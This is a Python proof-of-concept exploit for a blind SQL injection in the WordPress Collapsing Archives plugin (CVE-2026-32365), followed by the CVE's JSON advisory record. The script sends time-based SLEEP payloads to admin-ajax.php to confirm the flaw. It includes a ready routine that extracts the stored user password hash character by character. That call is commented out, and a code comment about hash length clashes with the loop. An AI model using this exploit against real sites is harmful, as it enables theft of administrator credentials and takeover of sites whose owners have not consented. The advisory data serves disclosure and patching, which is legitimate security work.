CVE-2026-32365

import requests import time # CVE-2026-32365 Blind SQL Injection PoC # Target: WordPress site with Collapsing Archives plugin <= 3.0.7 target_url = "http://target-site.com/wp-admin/admin-ajax.php" def blind_sql_inject(payload): """Execute blind SQL injection and return result based on response time""" headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0" } data = { "action": "collapsing_archives", "custom_field": payload } start_time = time.time() response = requests.post(target_url, data=data, headers=headers, timeout=30) elapsed_time = time.time() - start_time return elapsed_time > 5 # True if time-based blind injection successful def extract_char(position, ascii_value): """Extract a single character from database using blind injection""" # Payload to test if ASCII value at position matches payload = f"test' AND (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),{position},1))={ascii_value}) THEN SLEEP(5) ELSE 0 END)-- -" return blind_sql_inject(payload) def extract_admin_password(): """Extract admin password hash using blind SQL injection""" password_hash = "" charset = "0123456789abcdef" for pos in range(1, 65): # MD5 hash is 32 characters for char in charset: ascii_val = ord(char) if extract_char(pos, ascii_val): password_hash += char print(f"Position {pos}: {char} (Hash: {password_hash})") break return password_hash # Example: Test if vulnerability exists test_payload = "test' AND SLEEP(5)-- -" if blind_sql_inject(test_payload): print("[+] Vulnerability confirmed! Blind SQL Injection is possible.") print("[*] Extracting admin password hash...") # admin_hash = extract_admin_password() # print(f"[+] Admin password hash: {admin_hash}") else: print("[-] Target may not be vulnerable or plugin not installed.")

{"cve": {"id": "CVE-2026-32365", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:50.580", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in robfelty Collapsing Archives collapsing-archives allows Blind SQL Injection.This issue affects Collapsing Archives: from n/a through <= 3.0.7."}, {"lang": "es", "value": "Neutralización Incorrecta de Elementos Especiales utilizados en un Comando SQL ('Inyección SQL') vulnerabilidad en robfelty Collapsing Archives collapsing-archives permite Inyección SQL Ciega. Este problema afecta a Collapsing Archives: desde n/a hasta &lt;= 3.0.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/collapsing-archives/vulnerability/wordpress-collapsing-archives-plugin-3-0-7-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}